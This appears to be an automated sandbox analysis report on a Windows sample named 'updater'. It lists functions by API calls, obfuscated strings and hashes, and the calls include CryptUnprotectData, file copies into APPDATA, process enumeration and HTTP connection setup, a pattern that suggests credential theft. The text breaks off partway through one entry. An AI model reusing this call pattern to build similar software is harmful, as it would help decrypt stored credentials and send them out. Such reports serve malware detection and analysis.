Opcode Fuzzy Hash: 864134fe9463fd46e622812077fbba67faf6fe5618b4d39093ee305d6e7f5d8e
Instruction Fuzzy Hash: A6220472D04285CEDB14EFA8E448BDDFBB0AF26318F25019ED0516B2B9CBB45A45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01433BF4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0144E0E8), ref: 01433C5E
_free.LIBCMT ref: 01433C4C

Part of subcall function 01430123: HeapFree.KERNEL32(00000000,00000000), ref: 01430139
Part of subcall function 01430123: GetLastError.KERNEL32(?,?,0142DA9C), ref: 0143014B

_free.LIBCMT ref: 01433E18

Strings

Pacific Standard Time, xrefs: 01433CCD
Pacific Daylight Time, xrefs: 01433CFC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 2155170405-1154798116
Opcode ID: 0cd0e583f44555f5f9797965f4d493714e1dfe2cd1847c16f93de4ad1e6039c0
Instruction ID: e791c73cf4a51b96e289aea35fd8f421a62e4ab8344ae38caebbc1ddf1bf3d58
Opcode Fuzzy Hash: 0cd0e583f44555f5f9797965f4d493714e1dfe2cd1847c16f93de4ad1e6039c0
Instruction Fuzzy Hash: CC511C71C00216ABDB24DF6ADC809AA77BCFFA9314F15026FE560A72B0E7349D41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01406107 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

FindClose.KERNEL32(000000FF,?,01406136,?,?,?,?,013C2C64,?,?,?,?), ref: 01406113
FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,?,01406136,?), ref: 01406143
GetLastError.KERNEL32(?,?,?,?,01406136,?,?,?,?,013C2C64,?,?,?,?), ref: 01406150
FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,01406136,?,?,?,?,013C2C64), ref: 0140616A
GetLastError.KERNEL32(?,?,?,?,01406136,?,?,?,?,013C2C64,?,?,?,?), ref: 01406177

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Find$ErrorFileFirstLast$Close
String ID:
API String ID: 569926201-0
Opcode ID: 7317845be2016179a759c9be0f6391a0c0cc3f14bd021bd40df29440f0278881
Instruction ID: 599cbf167b8131e3034951626a6cf1bc4bb88aa1f2950c0a8b5eebee28aa9eae
Opcode Fuzzy Hash: 7317845be2016179a759c9be0f6391a0c0cc3f14bd021bd40df29440f0278881
Instruction Fuzzy Hash: C3016D75000185BBCB321F669C08C5B7E79EB92761B11452AFA6A892F6C7318472DB60

Uniqueness

Uniqueness Score: -1.00%

Function 01422780 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0142277F,?,?,?,?,?,01423E8D), ref: 014227A2
TerminateProcess.KERNEL32(00000000,?,0142277F,?,?,?,?,?,01423E8D), ref: 014227A9
ExitProcess.KERNEL32 ref: 014227BB

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 78d3b88d4c571596333f1b6b8c901afd96361daccfe625a82118f8872348c0aa
Instruction ID: 3d7dbf3abd49cb39c6174362c6c1e902d79e5cf5f1a4722c455b56e291e7d4f2
Opcode Fuzzy Hash: 78d3b88d4c571596333f1b6b8c901afd96361daccfe625a82118f8872348c0aa
Instruction Fuzzy Hash: A7E08C3A000118AFCF226F69D848E493F39FFA4693B404819F9048A235CB76D882CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013D2705 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(Jx~`.,00000000,00000000,00000000,00000000,00000000,?,?,-00000046,00000000), ref: 013D273D

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Strings

r`A\Jx~`., xrefs: 013D2743

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CryptDataDeallocateUnprotect
String ID: r`A\Jx~`.
API String ID: 174072602-705364654
Opcode ID: eff30e25ce51fe50e4fe6dfe7ba3ee76b98f180088475ba475fa90c54c2ae23f
Instruction ID: fa8d7f346289746d5e404b7b6564c8bf3d009b558731b753dc768181b40c49ae
Opcode Fuzzy Hash: eff30e25ce51fe50e4fe6dfe7ba3ee76b98f180088475ba475fa90c54c2ae23f
Instruction Fuzzy Hash: 04114F76D0020AAFDB15DFE9E4909EEFBB8FF58204F00455EE511A3290DB745A08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013D6592 Relevance: 3.1, APIs: 2, Instructions: 126processCOMMON

Download Yara Rule

APIs

Process32Next.KERNEL32(?,00000128,?,?,?), ref: 013D66E6
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000001,00000000), ref: 013D65DE

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CreateDeallocateNextProcess32SnapshotToolhelp32
String ID:
API String ID: 2624477505-0
Opcode ID: d4aa161dabff5bef0f8065109e936fbb0c199586fbf61f58274d344f6669b8d8
Instruction ID: 399c47c9c0b4f7f5bf4a9d5c04583ffdfd471ffb9cf92a68a934208f09f3783b
Opcode Fuzzy Hash: d4aa161dabff5bef0f8065109e936fbb0c199586fbf61f58274d344f6669b8d8
Instruction Fuzzy Hash: 5A510AB2D0020ADFDF10DFA9D9809EEBBB9AF58304F14416EE515A3290DB749A45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0141E5AE Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0141E5B3

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6dff5d6b53566ce8d64383fa53a7f95a8bdd135d4bf79e52ea1aa3123194ae08
Instruction ID: d4f4a8e2c632237e14f0eae8c1866a65d463d669199a906b202ff49a74696ed0
Opcode Fuzzy Hash: 6dff5d6b53566ce8d64383fa53a7f95a8bdd135d4bf79e52ea1aa3123194ae08
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0142FDA7 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

GetSystemTimePreciseAsFileTime, xrefs: 0142FDB7

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: GetSystemTimePreciseAsFileTime
API String ID: 0-595813830
Opcode ID: c26ab8c6b30cf43f0dfe4295e838eeee5ecbd7066cea2b4a72778e8e1ab22d1b
Instruction ID: 4e97cdf30758beefb134ea827c9d5d5045c65b1c13a1445d2b1b95f5937f6525
Opcode Fuzzy Hash: c26ab8c6b30cf43f0dfe4295e838eeee5ecbd7066cea2b4a72778e8e1ab22d1b
Instruction Fuzzy Hash: DAE0C237BC163973D32422D66C05EAA7A16C760AB2F5401ABFF08962309AB1085683D0

Uniqueness

Uniqueness Score: -1.00%

Function 01430095 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
Instruction ID: c83b1f0514ce511d897b96b13bac6e0b86fc758f4e6297ccc9caa475f8dbe290
Opcode Fuzzy Hash: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
Instruction Fuzzy Hash: 09E04672912228EBCB14DB8DD90498AFBBCEB89A00B55019AFA01D3220C6B0DE40C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 013D2C33 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 221
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013C347A: ___std_fs_get_current_path@8.LIBCPMT ref: 013C34C9

Part of subcall function 013DDD77: _Deallocate.LIBCONCRT ref: 013DDD8C

SetCurrentDirectoryA.KERNEL32(?,?), ref: 013D2C8E
LoadLibraryA.KERNEL32(00000000), ref: 013D2D28
GetProcAddress.KERNEL32(01465BB8), ref: 013D2DC9
GetProcAddress.KERNEL32(014654AC), ref: 013D2ED1
GetProcAddress.KERNEL32(01464FE8), ref: 013D2E52

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

GetProcAddress.KERNEL32(00000000), ref: 013D2F36
SetCurrentDirectoryA.KERNEL32(?), ref: 013D2F56

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

eKW}, xrefs: 013D2DE0
K., xrefs: 013D2E69
BAZ., xrefs: 013D2DE7
`}}q, xrefs: 013D2D4D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AddressCriticalProcSection$CurrentDirectoryEnterLeave$ConditionDeallocateLibraryLoadVariableWake___std_fs_get_current_path@8
String ID: BAZ.$K.$`}}q$eKW}
API String ID: 618739938-911188691
Opcode ID: 018ecbef486ef0105f6722b0107ef7f8b5c1a849e409dc8e6e53300d07d18d1e
Instruction ID: adf011e65352f9f83c20f09484125543d15ec7f8a8469887fc5be53aea16d03e
Opcode Fuzzy Hash: 018ecbef486ef0105f6722b0107ef7f8b5c1a849e409dc8e6e53300d07d18d1e
Instruction Fuzzy Hash: 4B912271A00246DBDF25EFA8E444A9EBBB4BF6431CF24011EE561AB1B5CB706684CF52

Uniqueness

Uniqueness Score: -1.00%

Function 01406531 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01405C8D: GetModuleHandleW.KERNEL32(00000000,00000000,?,01406317,01463954,kernel32.dll,GetFileInformationByHandleEx,01405D5A,00000003,?,00000080,0144439A), ref: 01405C9D
Part of subcall function 01405C8D: GetProcAddress.KERNEL32(00000000,0144439A,?,01406317,01463954,kernel32.dll,GetFileInformationByHandleEx,01405D5A,00000003,?,00000080,0144439A), ref: 01405CAB

RemoveDirectoryW.KERNEL32(00000000,01463958,kernel32.dll,SetFileInformationByHandle,01405D5A,CE5F1F10,?,?,?,00000000), ref: 0140657C
GetLastError.KERNEL32(?,?,00000000), ref: 01406594
DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 014065A4
GetLastError.KERNEL32(?,?,00000000), ref: 014065AE
GetLastError.KERNEL32(?,?,00000000), ref: 014065B8
___std_fs_open_handle@16.LIBCPMT ref: 014065EB

Strings

SetFileInformationByHandle, xrefs: 0140655F
kernel32.dll, xrefs: 01406564

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressDeleteDirectoryFileHandleModuleProcRemove___std_fs_open_handle@16
String ID: SetFileInformationByHandle$kernel32.dll
API String ID: 1377414829-82236170
Opcode ID: ec96c78ce19e08c38f01bf30b7263a44e3ecb6d23ac594047eba181495e247ee
Instruction ID: 8f40deaf5bad38c0e507555d8e522b7126cb08929762b80edfe16fb5cf23ec37
Opcode Fuzzy Hash: ec96c78ce19e08c38f01bf30b7263a44e3ecb6d23ac594047eba181495e247ee
Instruction Fuzzy Hash: 03415975A04104ABEB22AB7ACC08BAE7FB5AB44755F154137E906F23F4DB7088168B70

Uniqueness

Uniqueness Score: -1.00%

Function 014344F6 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 0143477E

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 63e6a948fa9b505e8253cb200bdf17975051419d9a9bb6847a10369e115017e1
Instruction ID: c3f195460ad88ba294e15d0c72527c35ec3dfb9611aabb0fa6d1ccbaf19c27de
Opcode Fuzzy Hash: 63e6a948fa9b505e8253cb200bdf17975051419d9a9bb6847a10369e115017e1
Instruction Fuzzy Hash: A7C1D074A002469FDF16DF9AD880BEEBBB0BF9E314F08405AE5159B3A1C7349942CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013CDDC0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 297
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

CopyFileA.KERNEL32 ref: 013CE0F6

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

YOBB, xrefs: 013CE126
., xrefs: 013CDFBD
., xrefs: 013CE13A
KZ, xrefs: 013CE12D
OZ, xrefs: 013CE134
A\Kr, xrefs: 013CE11F
(\;, xrefs: 013CE195
rYOBBKZJOZ., xrefs: 013CDED2
JOZ., xrefs: 013CDEA0

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: (\;$.$.$A\Kr$JOZ.$KZ$OZ$YOBB$rYOBBKZJOZ.
API String ID: 265086031-884814007
Opcode ID: 7982da8f42d177e47ee405d903a0ccb8f51063835126966903f7166038c38a92
Instruction ID: f2e25a0c1e166b44c370d27c9aa0ef453468213c86ef4c4cf5ea958ca061f969
Opcode Fuzzy Hash: 7982da8f42d177e47ee405d903a0ccb8f51063835126966903f7166038c38a92
Instruction Fuzzy Hash: A4C1F331D04289DFDF25EBE8D844BDDBBB0BF21718F24409DE0456B2A5DB701A89CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0143C47C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0143C135: CreateFileW.KERNEL32(00000000,00000000,?,0143C525,?,?,00000000), ref: 0143C152

GetLastError.KERNEL32 ref: 0143C590
__dosmaperr.LIBCMT ref: 0143C597
GetFileType.KERNEL32 ref: 0143C5A3
GetLastError.KERNEL32 ref: 0143C5AD
__dosmaperr.LIBCMT ref: 0143C5B6
CloseHandle.KERNEL32(00000000), ref: 0143C5D6
CloseHandle.KERNEL32(01430CCF), ref: 0143C723
GetLastError.KERNEL32 ref: 0143C755
__dosmaperr.LIBCMT ref: 0143C75C

Strings

H, xrefs: 0143C6E1

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 87439af1f5137e60685ebce70b2f1b1afd9b5593f4f2e219e55686311b3f1c9b
Instruction ID: 8a1e0bbee969944495672b0b4e35a1886331cc4a5cb93863010bbde608c22e9a
Opcode Fuzzy Hash: 87439af1f5137e60685ebce70b2f1b1afd9b5593f4f2e219e55686311b3f1c9b
Instruction Fuzzy Hash: 6AA12632A041558FCF1ADF78DC917AE3BB1AB9A324F18015FE801AB3B1CB359812CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013CF68F Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 296
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

CopyFileA.KERNEL32 ref: 013CF9CB

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

rYOB, xrefs: 013CF9F4
., xrefs: 013CF892
rYOBBKZJOZ., xrefs: 013CF7A1
JOZ., xrefs: 013CF76F
JOZ., xrefs: 013CFA02
G\, xrefs: 013CF7EC
(\;, xrefs: 013CFA60
BKZ, xrefs: 013CF9FB

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: (\;$.$BKZ$G\$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
API String ID: 265086031-3695542673
Opcode ID: fd25e40bc74428bc829f0d61c8eb7c706ef96a4de5df28f4e052ae2ba4bc3721
Instruction ID: d7ca4d761c36282f348f0eb4dd81d41d18d5a4097e7d078a3d6af80d60fca769
Opcode Fuzzy Hash: fd25e40bc74428bc829f0d61c8eb7c706ef96a4de5df28f4e052ae2ba4bc3721
Instruction Fuzzy Hash: DEC1F231D0028ADEDF15EBE8D884BDDBBB5BF21708F24409ED5457B2A5DB701A49CB22

Uniqueness

Uniqueness Score: -1.00%

Function 013CD88B Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 324
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

CopyFileA.KERNEL32 ref: 013CDB97

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

A\OI, xrefs: 013CD974
APPDATA, xrefs: 013CD9F5
XKBJ, xrefs: 013CD98C
Lr, xrefs: 013CD993
(\;, xrefs: 013CDC0F
., xrefs: 013CD999
KrBK, xrefs: 013CD985

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: (\;$.$APPDATA$A\OI$KrBK$Lr$XKBJ
API String ID: 265086031-1641328896
Opcode ID: 148284c69a845b3d3a650380149941e34ae429c4cec856bfec087d548ec4d33e
Instruction ID: 95f7bd4650a04c9dacc5f7b9d50aa161cf2f87e8046d6ebd64b93fcddf0ed2f8
Opcode Fuzzy Hash: 148284c69a845b3d3a650380149941e34ae429c4cec856bfec087d548ec4d33e
Instruction Fuzzy Hash: 4CE18C31D0524ADEDF15EBE8D990AEDBBB4AF24308F2440AED40667291DB702F49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013DC44A Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 295networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(01464FBC,00000000,00000000,00000000,00000000), ref: 013DC4E1
InternetConnectA.WININET(00000000,01462A14,00000050,00000000,00000000,00000003,00000000,00000000), ref: 013DC507
HttpOpenRequestA.WININET(00000000,01464D5C,01464CFC,00000000,00000000,00000000,8468C200,00000000), ref: 013DC605
